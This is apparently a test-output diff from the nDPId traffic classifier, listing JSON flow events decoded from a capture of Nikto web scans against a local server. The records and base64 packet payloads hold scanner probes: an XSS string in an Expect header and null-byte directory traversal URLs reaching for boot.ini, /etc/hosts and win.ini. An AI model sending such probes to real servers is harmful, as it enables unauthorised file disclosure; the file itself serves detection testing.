+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276835,"pkt":"AAAAAAAAAAAAAAAACABFAADKANNAAEAGO1l\/AAABfwAAAcJmH5BoODjpUSa4iYAYAED+vgAAAQEICp1m+4udZvuLR0VUIC9+YmluIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGV1c2Vyczoga25vd24gdXNlcikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420276837,"pkt":"AAAAAAAAAAAAAAAACABFAADlgjNAAEAGud1\/AAABfwAAAcJoH5AFkroJ2Lkky4AYAED+2QAAAQEICp1m+42dZvuNR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KRXhwZWN0OiA8c2NyaXB0PmFsZXJ0KHhzcyk8L3NjcmlwdD4NClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGVfZXhwZWN0X3hzcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1576420276839,"pkt":"AAAAAAAAAAAAAAAACABFAAEW4vNAAEAGWOx\/AAABfwAAAcJqH5CF6NrJzvbnOoAYAED\/CgAAAQEICp1m+4+dZvuOR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvYm9vdC5pbmklMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRpcmVjdG9yeSB0cmF2ZXJzYWwgY2hlY2spDQoNCg=="} -01142{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +01142{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1576420276840,"pkt":"AAAAAAAAAAAAAAAACABFAAEXDe5AAEAGLfF\/AAABfwAAAcJsH5C64jXXMX558oAYAED\/CwAAAQEICp1m+5CdZvuQR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL2hvc3RzJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01144{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +01144{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00798{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1576420276841,"pkt":"AAAAAAAAAAAAAAAACABFAAEi9VxAAEAGRnd\/AAABfwAAAcJuH5BHUs1h0rvodIAYAED\/FgAAAQEICp1m+5GdZvuRR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvSEFTSCgweDU1NTllODRmYmM0MCklMDAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":297,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":297,"pkt_l4_len":263,"thread_ts_msec":1576420276842,"pkt":"AAAAAAAAAAAAAAAACABFAAEbV1RAAEAG5IZ\/AAABfwAAAcJwH5AGYW9pnm57IYAYAED\/DwAAAQEICp1m+5KdZvuSR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2lubnQvd2luLmluaSUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1576420276844,"pkt":"AAAAAAAAAAAAAAAACABFAAEdYctAAEAG2g1\/AAABfwAAAcJyH5D8wFnzKu6RnoAYAED\/EQAAAQEICp1m+5SdZvuUR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2luZG93cy93aW4uaW5pJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KDQo="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 